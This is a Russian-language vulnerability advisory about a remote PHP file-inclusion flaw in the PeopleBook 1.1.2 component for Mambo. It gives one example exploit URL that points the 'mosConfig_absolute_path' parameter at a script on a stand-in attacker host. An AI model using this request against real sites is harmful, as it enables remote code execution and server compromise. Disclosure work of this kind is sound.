PHP-инклюдинг в Mambo PeopleBook

Дата публикации:
16.08.2006
Всего просмотров:
5387
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PeopleBook 1.x (компонент к Mambo)
Уязвимые версии: PeopleBook (компонент Mambo) 1.1.2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_peoplebook/param.peoplebook.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[target]/[path]/administrator/components/com_peoplebook/param.
peoplebook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

URL производителя: mamboxchange.com/projects/peoplebook

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities

или введите имя

CAPTCHA